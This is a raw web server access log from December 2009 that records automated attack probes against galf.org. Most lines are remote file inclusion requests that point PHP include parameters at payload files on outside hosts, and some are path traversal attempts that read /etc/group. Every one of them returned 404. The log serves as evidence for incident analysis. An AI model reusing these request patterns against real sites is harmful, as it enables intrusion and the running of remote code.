200.74.143.51 - - [21/Dec/2009:01:09:43 -0800] "GET /logs/access_091102.log//bbs//skin/ggambo7002_board/setup.php?dir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:09:56 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:09:59 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
209.97.212.123 - - [21/Dec/2009:01:10:14 -0800] "GET /logs//squito/photolist.inc.php?photoroot=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [21/Dec/2009:01:10:14 -0800] "GET /logs//squito/photolist.inc.php?photoroot=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:10:34 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:10:34 -0800] "GET /logs/access_090706.log%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:10:35 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [21/Dec/2009:01:10:40 -0800] "GET /modify.php?dir_module=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [21/Dec/2009:01:10:40 -0800] "GET /logs/access_091109.log%20%20//modify.php?dir_module=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [21/Dec/2009:01:10:40 -0800] "GET /logs//modify.php?dir_module=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:11:31 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:11:31 -0800] "GET /logs/access_090629.log//include/admin.lib.inc.php?site_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:11:31 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [21/Dec/2009:01:11:31 -0800] "GET /logs/access_091026.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [21/Dec/2009:01:12:41 -0800] "GET /logs/access_091116.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [21/Dec/2009:01:12:45 -0800] "GET /logs/access.log//modify.php?dir_module=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [21/Dec/2009:01:12:58 -0800] "GET /logs/access.log%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
200.93.147.154 - - [21/Dec/2009:01:13:34 -0800] "GET /logs/access_090706.log%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:13:40 -0800] "GET /logs/access_090706.log%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:13:41 -0800] "GET /logs/access.log%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
200.93.147.154 - - [21/Dec/2009:01:13:41 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:13:41 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:14:19 -0800] "GET /logs/access_090629.log//include/admin.lib.inc.php?site_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:14:19 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:14:19 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [21/Dec/2009:01:15:13 -0800] "GET /logs/access_091109.log//modify.php?dir_module=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [21/Dec/2009:01:15:13 -0800] "GET /modify.php?dir_module=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [21/Dec/2009:01:15:13 -0800] "GET /logs//modify.php?dir_module=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [21/Dec/2009:01:15:47 -0800] "GET /logs/access_090706.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [21/Dec/2009:01:15:48 -0800] "GET /logs/access_091012.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:17:13 -0800] "GET /common/db.php?commonpath=http://www.thaisocial.net/~constitution/crawler_project/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:17:13 -0800] "GET /logs/access_090921.log/common/db.php?commonpath=http://www.thaisocial.net/~constitution/crawler_project/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:17:13 -0800] "GET /logs/common/db.php?commonpath=http://www.thaisocial.net/~constitution/crawler_project/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
208.187.91.50 - - [21/Dec/2009:01:17:48 -0800] "GET /logs//appserv/main.php?appserv_root=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.187.91.50 - - [21/Dec/2009:01:17:48 -0800] "GET /appserv/main.php?appserv_root=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.187.91.50 - - [21/Dec/2009:01:17:48 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.152.145.54 - - [21/Dec/2009:01:18:48 -0800] "GET /logs/access.log//modify.php?dir_module=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.61.97 - - [21/Dec/2009:01:18:51 -0800] "GET /common/db.php?commonpath=http://www.thaisocial.net/~constitution/crawler_project/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:18:51 -0800] "GET /logs/common/db.php?commonpath=http://www.thaisocial.net/~constitution/crawler_project/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:19:09 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:19:09 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
128.241.54.188 - - [21/Dec/2009:01:19:32 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://www.urmary.ru//appserv/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
128.241.54.188 - - [21/Dec/2009:01:19:32 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.urmary.ru//appserv/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
128.241.54.188 - - [21/Dec/2009:01:19:32 -0800] "GET /logs/access_090824.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.urmary.ru//appserv/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
128.241.54.188 - - [21/Dec/2009:01:19:41 -0800] "GET /logs/access_090907.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.urmary.ru//appserv/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [21/Dec/2009:01:21:57 -0800] "GET /appserv/main.php?appserv_root=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [21/Dec/2009:01:21:57 -0800] "GET /logs/access_090921.log%20%20//appserv/main.php?appserv_root=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [21/Dec/2009:01:21:57 -0800] "GET /logs//appserv/main.php?appserv_root=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [21/Dec/2009:01:22:15 -0800] "GET /logs/access_091109.log//modify.php?dir_module=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [21/Dec/2009:01:25:09 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [21/Dec/2009:01:25:40 -0800] "GET /logs/access_090921.log/admin.php?cal_dir=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [21/Dec/2009:01:25:40 -0800] "GET /admin.php?cal_dir=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [21/Dec/2009:01:25:40 -0800] "GET /logs/admin.php?cal_dir=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [21/Dec/2009:01:26:03 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [21/Dec/2009:01:26:03 -0800] "GET /logs/access_090706.log//modules/vwar/admin/admin.php?vwar_root=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [21/Dec/2009:01:26:03 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [21/Dec/2009:01:26:31 -0800] "GET /logs/access_090720.log/admin.php?cal_dir=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.97.212.123 - - [21/Dec/2009:01:27:59 -0800] "GET /logs/access_090706.log//squito/photolist.inc.php?photoroot=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [21/Dec/2009:01:28:00 -0800] "GET /logs/access_090706.log//squito/photolist.inc.php?photoroot=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:01:30:41 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:01:30:44 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:01:30:44 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:01:30:47 -0800] "GET /logs/access_090706.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:01:30:47 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:01:30:48 -0800] "GET /logs/access_090706.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:01:30:59 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:01:31:01 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:01:31:01 -0800] "GET /logs/access_090706.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:01:31:52 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:01:31:53 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:01:31:54 -0800] "GET /logs/access_090706.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [21/Dec/2009:01:35:36 -0800] "GET /logs//include.php?path%5Bdocroot%5D=http://med.buu.ac.th/administrator/popups/id2?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [21/Dec/2009:01:35:36 -0800] "GET /logs/access_090921.log//include.php?path%5Bdocroot%5D=http://med.buu.ac.th/administrator/popups/id2?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [21/Dec/2009:01:35:36 -0800] "GET /include.php?path%5Bdocroot%5D=http://med.buu.ac.th/administrator/popups/id2?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.239.36 - - [21/Dec/2009:01:35:38 -0800] "GET /index.php?loc=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
69.16.239.36 - - [21/Dec/2009:01:35:38 -0800] "GET /index.php?loc=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
121.101.214.54 - - [21/Dec/2009:01:35:42 -0800] "GET /logs/access_091123.log//include.php?path%5Bdocroot%5D=http://med.buu.ac.th/administrator/popups/id2?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:36:07 -0800] "GET /logs/access.log/////bbs//skin/ggambo7002_board/write.php?dir=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:36:10 -0800] "GET ////bbs//skin/ggambo7002_board/write.php?dir=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:36:10 -0800] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [21/Dec/2009:01:36:22 -0800] "GET /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.dscontrol.co.kr/data/members/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [21/Dec/2009:01:36:22 -0800] "GET /logs/access_090706.log//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.dscontrol.co.kr/data/members/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [21/Dec/2009:01:36:22 -0800] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.dscontrol.co.kr/data/members/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:36:25 -0800] "GET /logs/access_091130.log/////bbs//skin/ggambo7002_board/write.php?dir=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:37:00 -0800] "GET /logs/access.log/////bbs//skin/ggambo7002_board/write.php?dir=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:37:00 -0800] "GET ////bbs//skin/ggambo7002_board/write.php?dir=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:37:00 -0800] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
153.19.209.78 - - [21/Dec/2009:01:37:07 -0800] "GET /logs/ HTTP/1.1" 200 4942 "http://www.google.pl/search?hl=pl&num=50&q=intitle%3Aindex.of+%22log%22+access.log+-htm+-html+-php+-asp+%22Last+Modified%22&btnG=Szukaj&lr=&aq=f&oq=" "Opera/9.80 (Windows NT 6.0; U; pl) Presto/2.2.15 Version/10.10" "www.galf.org"
153.19.209.78 - - [21/Dec/2009:01:37:08 -0800] "GET /favicon.ico HTTP/1.1" 404 - "http://www.galf.org/logs/" "Opera/9.80 (Windows NT 6.0; U; pl) Presto/2.2.15 Version/10.10" "www.galf.org"
121.101.214.54 - - [21/Dec/2009:01:38:06 -0800] "GET /logs/access_090921.log%20%20//include.php?path%5Bdocroot%5D=http://med.buu.ac.th/administrator/popups/id2?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [21/Dec/2009:01:38:06 -0800] "GET /logs/access_091123.log%20%20//include.php?path%5Bdocroot%5D=http://med.buu.ac.th/administrator/popups/id2?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [21/Dec/2009:01:39:07 -0800] "GET /logs/access_091012.log//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.dscontrol.co.kr/data/members/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:41:24 -0800] "GET ////bbs//skin/ggambo7002_board/write.php?dir=http://www.thaisocial.net/~constitution/crawler_project/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:41:24 -0800] "GET /logs/access_090921.log%20/////bbs//skin/ggambo7002_board/write.php?dir=http://www.thaisocial.net/~constitution/crawler_project/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:41:24 -0800] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://www.thaisocial.net/~constitution/crawler_project/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
69.16.239.36 - - [21/Dec/2009:01:41:48 -0800] "GET /logs/index.php?loc=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
69.16.239.36 - - [21/Dec/2009:01:41:48 -0800] "GET /logs/index.php?loc=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:43:02 -0800] "GET /logs/access.log/////bbs//skin/ggambo7002_board/write.php?dir=http://www.thaisocial.net/~constitution/crawler_project/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:43:02 -0800] "GET ////bbs//skin/ggambo7002_board/write.php?dir=http://www.thaisocial.net/~constitution/crawler_project/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:43:02 -0800] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://www.thaisocial.net/~constitution/crawler_project/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:43:09 -0800] "GET ////bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:43:09 -0800] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:43:14 -0800] "GET /logs/access.log/////bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:43:30 -0800] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://www.thaisocial.net/~constitution/crawler_project/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:43:30 -0800] "GET /logs/access.log/////bbs//skin/ggambo7002_board/write.php?dir=http://www.thaisocial.net/~constitution/crawler_project/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:43:30 -0800] "GET ////bbs//skin/ggambo7002_board/write.php?dir=http://www.thaisocial.net/~constitution/crawler_project/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:01:43:33 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:01:43:34 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:01:43:34 -0800] "GET /logs/access_090706.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:01:43:41 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:01:43:41 -0800] "GET /logs/access_090706.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
